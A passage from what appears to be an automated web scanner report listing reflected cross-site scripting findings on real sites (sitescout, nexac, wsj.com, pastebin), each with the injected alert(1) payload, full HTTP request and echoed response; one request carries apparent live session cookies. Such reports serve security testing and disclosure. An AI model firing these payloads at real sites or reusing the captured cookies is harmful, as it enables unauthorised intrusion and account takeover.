GET /tag.jsp?pid=0384790e9c45"%3balert(1)//f523be3e8b3&w=300&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:35 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790e9c45";alert(1)//f523be3e8b3&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAu
...[SNIP]...

3.260. http://mf.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 934f2'%3balert(1)//25e8b63311e was submitted in the w parameter. This input was echoed as 934f2';alert(1)//25e8b63311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300934f2'%3balert(1)//25e8b63311e&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:37 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300934f2';alert(1)//25e8b63311e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.261. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57401"><script>alert(1)</script>c45cd3456f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rQACp/p; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/613821370/x96/default/empty.gif/72634857383032743672514143702f70?x" target="_top"><IMG SRC="
...[SNIP]...

3.262. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b04c"><script>alert(1)</script>d331ea74841 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rYACzMV; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1296153028/x96/default/empty.gif/726348573830327436725941437a4d56?x" target="_top"><IMG SRC
...[SNIP]...

3.263. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673dc"><script>alert(1)</script>a2584dc8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x96673dc"><script>alert(1)</script>a2584dc8a HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rgADA1J; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 316
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/515170640/x96673dc"><script>alert(1)</script>a2584dc8a/default/empty.gif/7263485738303274367267414441314a?x" target="_top"><IMG SRC="h
...[SNIP]...

3.264. http://online.wsj.com/pznusersvc/view/user/profile [profileType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /pznusersvc/view/user/profile

Issue detail

The value of the profileType request parameter is copied into the HTML document as plain text between tags. The payload ac37d<img%20src%3da%20onerror%3dalert(1)>b99e259bd90 was submitted in the profileType parameter. This input was echoed as ac37d<img src=a onerror=alert(1)>b99e259bd90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pznusersvc/view/user/profile?profileType=weatherCodeac37d<img%20src%3da%20onerror%3dalert(1)>b99e259bd90 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=ce32ca17-585f-4a0a-99bf-c279acbbbcbf; s_dbfe=1282392681928; __qca=P0-743540389-1290545978930; _jsuid=6513768286877581798; __g_u=395535113978113_28_1_0_5_1301679673414; ebNewBandWidth_.online.wsj.com=3617%3A1302926418459; mbox=PC#1300360459279-276749.17#1304331804|check#true#1303122264|session#1303122203590-384831#1303124064; CMC=top; _chartbeat2=zupc84z6lzxpous0; rsi_csl=; rsi_segs=; DJCOOKIE=ORC%3Dna%2Cus%7C%7CHOMEPAGE%3D%2Fhome%2Fus%7C%7CweatherUser%3D8fac3139-0617-465d-9960-22995a8c9638%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2262%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2019%20Apr%202011%2015%3A24%3A45%20GMT%7C%7CweatherCode%3D10005; djcs_demo=VjE6IQ%3D%3D; user_type=subscribed; TR=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4; REMOTE_USER=8fac3139-0617-465d-9960-22995a8c9638; djcs_auto=M1303160624%2Fic7oHVSe6ZAJJvgji0B47XEN7w%2FChJjS3fhu02YDm5SWDDhy0Zn10b3M4d%2BwOiE6TpMhpUCwoXVyRw%2FH8XEelmXLalE62E%2F5bpT7EtL4mlwgNTgmuTNg5op9EUcdEtLW08KplzCxais88jelwpHnytOHVEhTfZzL%2BFjNmIJwuDbqlsTDqLUtPkBYAYRpELuy491fnh7wLkK2ux2IkVilOg%3D%3DG; djcs_session=M1303224228%2F8WLYaffKNNSJoOMfA3ykV6nDXspVXjtSlYhYtLLSg4iR03CgrlHezKBKUwHHVH24WAIx6%2F3OXAqNl5o687PJyRSTynKANcUD6kENtnvmWKLgTErQkUNCUrR1wI2rP7fHFwBCVPxN1RsojWYSv8I1CmZ8lbxW1n91We91bpWt%2FjgOL0u%2FKytXBQItfQSWVdtrA2KcjOSbB7GbftIntUDvYb5CFdhsoL%2FrPryurLxQ%2FaqrXI884qM9G32%2Fo41PjTCLKKsB8ZwYlxHmlWJqE267H5l%2BlHUOR09h%2FeVOO4VPsZbxgBRC7myYYyUzVKeEy2SFAay9%2BZ20XUnhpD9KCPYL549az4xWsGoSruEPgcjz5uKCDEWvXlzoeCApG7x3Gn7Pbo15ajtTHBjeK4n89tykZUB3SC5YWSpMpL9tQvAL7tQ%3DG; djcs_perm=M1303160624%2FvsgK966n7YDJYxNSotx%2Fk2poHCLRGJNkO65i365%2BHvN002%2FoBHhigAUNtfsMwKv8qh0vciaQHa15q2s5Ci7aDvRjtgyZR3hTI9DCkZI9wyOQOoYirlZ5DyAFUfGrYSA1JDgeqko%2BE7GXEO35K8%2BZXt0cdaE6OfTOXYdAi%2BFcxFgrvbJNP3fAfpO%2BmkBlwzNOMwr%2BHudSpNkioj%2BnLSZFBLro2RBMwNrMRjQr1BuItHq47zKHuIsRT3zRaoPvA5SbhVru9p4WwAwJJnaI3tujq87oQvzv%2BWD0ue81BVOMtDAAl3VieQ%2B8kHf%2FabiTCQ9rjsaWLJhxWGnwiEZ%2FQ%2Fv5Qg%3D%3DG; wsjlocal=VjE6aDAyMzMyQGdtYWlsLmNvbToyLDMsNCw3Miw3MywxNjEsMjgxLDMwMSw0ODEsODQxLDg2MQ%253D%253D; djcs_info=eycjdmVyJzonMScsJ2xhc3RfbmFtZSc6J0gnLCdzZXNzaW9uJzonZDBkZTdjMjAtMGE5Mi00NDFlLTgzMTMtZWQxZDg3N2ZmOWU0Jywncm9sZXMnOidXU0olMkNXU0otQUNDT1VOVCUyQ1dTSi1DSEFOR0VQQVNTV09SRCUyQ0JBUlJPTlMtQUNDT1VOVCUyQ0JBUlJPTlMtQ0hBTkdFUEFTU1dPUkQlMkNORVdTUkVBREVSJTJDV1NKLUFSQ0hJVkUlMkNGUkVFUkVHLUJBU0UlMkNXU0otTVlBQ0NPVU5ULUJBU0lDJTJDRlJFRVJFRy1JTkRJVklEVUFMJTJDV1NKLUlQQUQnLCd1dWlkJzonOGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4JywnZW1haWwnOidoMDIzMzIlNDBnbWFpbC5jb20nLCdmaXJzdF9uYW1lJzonRCcsJ3VzZXInOidoMDIzMzIlNDBnbWFpbC5jb20nfQ%3D%3D; DJSESSION=ORCS%3dna%2cus; wsjregion=na%2cus; s_vnum=1304458932007%26vn%3D49; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; spotlightSet=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 16:08:16 GMT
Server: Apache-Coyote/1.1
Set-Cookie: djcs_session=M1303224228%2FVpq2KvLNR7q3fjbF2kA2U%2FD%2F8HXnmY0REsJgp%2FFIbcos7XSLMH8qwSgfoN%2BO1GEJyfeIAP1ZoO2kso9EiSL4943wq2zo74fAZydO89xjpEQN%2F16Gi8%2F6bNBUf2bz98moa47s14AW%2B%2F0uKRHy3X7uNS2HiEmX60ZrhvOxSsAccCLS%2BnVWYdx2VdqX4fYtbhv6WLGWwDfrrMJtU5zTCLxMJP0nBncYZKMYfRmHr8BOodrkCUAlByfhyskiLs87bXsT45pZK1CzyHKXX%2FbJXi2DbtbnkqkQXFBwacqYcXW7IR5VDMm7zLyLlx4CNmVzuXvp4LFx1VE4ECtX1Sox59pgfO2kquMpExbymi4hKlAkVorzRJYsTDv%2FK9UfBA6Zs%2FgLijz6Ps954vO7lvaGz6ns4i3YMt9nYTBlwEaS%2FrGGw0M%3DG; domain=.wsj.com; path=/; httpOnly
Set-Cookie: wsjlocal=VjE6aDAyMzMyQGdtYWlsLmNvbToyLDMsNCw3Miw3MywxNjEsMjgxLDMwMSw0ODEsODQxLDg2MQ%253D%253D; domain=.wsj.com; path=/
Set-Cookie: djcs_info=eycjdmVyJzonMScsJ2xhc3RfbmFtZSc6J0gnLCdzZXNzaW9uJzonZDBkZTdjMjAtMGE5Mi00NDFlLTgzMTMtZWQxZDg3N2ZmOWU0Jywncm9sZXMnOidXU0olMkNXU0otQUNDT1VOVCUyQ1dTSi1DSEFOR0VQQVNTV09SRCUyQ0JBUlJPTlMtQUNDT1VOVCUyQ0JBUlJPTlMtQ0hBTkdFUEFTU1dPUkQlMkNORVdTUkVBREVSJTJDV1NKLUFSQ0hJVkUlMkNGUkVFUkVHLUJBU0UlMkNXU0otTVlBQ0NPVU5ULUJBU0lDJTJDRlJFRVJFRy1JTkRJVklEVUFMJTJDV1NKLUlQQUQnLCd1dWlkJzonOGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4JywnZW1haWwnOidoMDIzMzIlNDBnbWFpbC5jb20nLCdmaXJzdF9uYW1lJzonRCcsJ3VzZXInOidoMDIzMzIlNDBnbWFpbC5jb20nfQ%3D%3D; domain=.wsj.com; path=/
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
App: PZNUsrSvc
Method: getUser/weatherCodeac37d<img src=a onerror=alert(1)>b99e259bd90
HostName: secj2kapachep09
Version: 1.0
Status: success
Content-Type: application/json;charset=UTF-8
Content-Length: 147
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC

{"User":{"profileType":"weatherCodeac37d<img src=a onerror=alert(1)>b99e259bd90","userId":"8fac3139-0617-465d-9960-22995a8c9638","profileData":[]}}

3.265. http://pastebin.com/74KXCaEZ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac1d9"><script>alert(1)</script>cc58d6ba2eb was submitted in the REST URL parameter 1. This input was echoed as ac1d9\"><script>alert(1)</script>cc58d6ba2eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZac1d9"><script>alert(1)</script>cc58d6ba2eb HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZac1d9\"><script>alert(1)</script>cc58d6ba2eb"/>
...[SNIP]...

3.266. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee33"><script>alert(1)</script>b559bf62345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ee33\"><script>alert(1)</script>b559bf62345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZ?6ee33"><script>alert(1)</script>b559bf62345=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZ?6ee33\"><script>alert(1)</script>b559bf62345=1"/>
...[SNIP]...

3.267. http://pastebin.com/CvGXyfiJ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c0"><script>alert(1)</script>1fb414533ea was submitted in the REST URL parameter 1. This input was echoed as 491c0\"><script>alert(1)</script>1fb414533ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ491c0"><script>alert(1)</script>1fb414533ea HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:32 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:32 GMT; path=/; domain=.pastebin.com
Content-Length: 11360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ491c0\"><script>alert(1)</script>1fb414533ea"/>
...[SNIP]...

3.268. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aade4"><script>alert(1)</script>5eef0908687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aade4\"><script>alert(1)</script>5eef0908687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ?aade4"><script>alert(1)</script>5eef0908687=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:31 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:31 GMT; path=/; domain=.pastebin.com
Content-Length: 11294

